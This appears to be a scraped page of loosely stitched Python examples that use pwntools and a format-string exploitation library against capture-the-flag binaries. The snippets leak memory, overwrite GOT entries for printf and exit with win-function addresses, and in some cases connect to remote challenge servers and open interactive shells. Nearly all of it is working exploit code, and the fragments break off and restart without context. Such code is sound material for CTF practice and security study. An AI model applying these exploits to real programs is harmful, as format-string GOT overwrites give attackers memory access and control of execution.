def test_win():
    winner = 0x4008DA

    connect()

    fmtStr = FormatString(exec_fmt,
                          elf=elf,
                          index=6,
                          pad=0,
                          explore_stack=False)

    fmtStr.write_q(elf.symbols['got.printf'], winner)

    p.sendline("2")
    p.sendline("")
    out = p.recvline()
    assert "This_is_the_flag" in out
Example #2
0
def startIt():
    global p
    global fmtStr
    p = process(os.path.join(SCRIPTDIR, fName), buffer_fill_size=0xffff)
    p.recvuntil("Input: ")
    fmtStr = FormatString(exec_fmt, elf=elf)
def test_it():
    fmtStr = FormatString(exec_fmt, elf=elf)
    assert fmtStr[elf.symbols['secret']] == 'This is my super secret string!'
    assert fmtStr[elf.symbols['loggedIn']] == "\x00"
Example #4
0
import IPython
import logging

logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger()

fName = "./deardiary"

elf = ELF(fName)


# For deardiary
def exec_fmt(s):
    global p
    p = process(fName, buffer_fill_size=0xffff)
    p.recvuntil("quit")
    p.sendline("1")
    p.sendline(s)
    p.recvuntil("quit")
    p.sendline("2")
    p.recvuntil(">")
    out = p.recvuntil("1.", drop=True)
    p.recvuntil("quit")
    p.close()
    return out


fmtStr = FormatString(exec_fmt, elf=elf)

print(fmtStr.leak.s(elf.symbols['data']))
Example #5
0
context.binary = elf


def connect():
    global p
    p = process(elf.file.name)
    #p = remote("146.185.132.36",19153)
    p.recvuntil("Exit the battle \n")


def exec_fmt(s):
    print("Sending: " + repr(s))
    p.sendline("2")
    sleep(0.1)
    p.sendline(s)
    ret = p.recvuntil("1. Stack Bufferoverflow Bug", drop=True)
    p.recvuntil("Exit the battle \n")
    return ret


winner = 0x4008DA

connect()

fmtStr = FormatString(exec_fmt, elf=elf, index=6, pad=0, explore_stack=False)

fmtStr.write_q(elf.symbols['got.printf'], winner)

p.sendline("2")
p.interactive()
Example #6
0

# print elf

print(hex(elf.got['exit']))
get_secret = 0x08048713
print hex(get_secret)


def exec_fmt(s):
  
    p = elf.process()
    # p =remote('problem1.tjctf.org',8008)

    p.recv()
    password = '******'
    p.sendline(password)
    p.recv()

    p.sendline(s)
    p.recvuntil('> ', drop=True)
    p.sendline(password)
    out =  p.recvuntil('\n\nTada!', drop=True)
    print p.recvall()
    return out

fmtStr = FormatString(exec_fmt,elf=elf, explore_stack=False)

# fmtStr.printStack()
fmtStr.write_d(elf.got['exit'], get_secret + 65537)
def test_it():
    fmtStr = FormatString(exec_fmt, elf=elf)
    assert fmtStr.leak.s(
        elf.symbols['secret']) == b'This is my super secret string!'
    assert fmtStr.leak.b(elf.symbols['loggedIn']) == 0
Example #8
0
#p=process('mary_morton')
p = remote("111.198.29.45", 44435)
elf = ELF('mary_morton')
libc = ELF('libc-2.23.so')
context.clear(arch='amd64')
taraddr = 0x4008da
print_addr = elf.got['printf']
print "printf_addr:" + hex(print_addr)
print p.recv()


def exec_fmt(s):
    p.sendline('2')
    sleep(0.1)
    p.sendline(s)
    ret = p.recvuntil('1. ', drop=True)
    return ret


#print fmt('aaaa')

fmt = FormatString(exec_fmt, elf=elf, index=6)
fmt.write_qword(print_addr, taraddr)
print p.recv()
p.sendline('1')

p.interactive()

#print offset
Example #9
0
def remote_atk(pl):
    with remote('163.172.176.29', 9035) as p:
        p.recvuntil('pwner, whats your name?\n')
        p.sendline(pl)
        p.recvuntil('Till then Bye')
        p.interactive()

    #fmtStr = FormatString(exec_fmt, elf=elf)
    # index = 10
    # pad = 0
    # {'max_explore': 64, 'already_written': 1, 'index': 10, 'arch': 'i386', 'bad_chars': '\n', 'elf': ELF('/media/sd128/sdcard/ctf/backdoor/32_new'), 'leak': pwnlib.memleak.MemLeak(<bound method FormatString._leak of <formatStringExploiter.FormatString.FormatString instance at 0x7f9a4db16bd8>>, search_range=20, reraise=True), 'pad': 0, 'endian': 'little', 'padChar': 'C', 'bits': 32, 'stack': [0, 134514964, 4287639208, 1, 4148418072, 878, 4148127336, 4288161396, 4294223700, 4294281328, 1246382666, 607203621, 1246382704, 134220362, 4148590104, 725871085, 4147803752, 4148010770, 22683471, 4291817104, 4292129648, 878, 4151142496, 0, 4294967295, 4151212128, 4149479868, 4151994464, 0, 0, 6, 4151131424, 4152049433, 0, 4152130256, 4292899208, 4290620128, 4151290523, 134513148, 4293949144, 4151720564, 2, 4152046640, 1, 0, 1, 4152199448, 4151566800, 4151689224, 4151902848, 4151410696, 4294738648, 4151880780, 4151888258, 4151115784, 0, 4152123392, 4152051992, 4292519760, 134513630, 1663069007, 745303919, 1869574944, 1702305902], 'exec_fmt': <function exec_fmt at 0x7f9a50914230>}
    # print vars(fmtStr)


# 0x84a8751
# 0x804870b
flag = elf.symbols['_Z4flagv']
#flag = 0x7be86c5
# 0x61a761a7
print hex(flag)
exit_got = elf.symbols['got.exit']
print hex(exit_got)
printf_plt = elf.symbols['got.printf']
print hex(printf_plt)

#payload = fmtstr_payload(10, {exit_got: flag})
# attack(payload)

payload = FormatString(attack, elf=elf, index=10, explore_stack=False)
payload.write_q(exit_got, flag)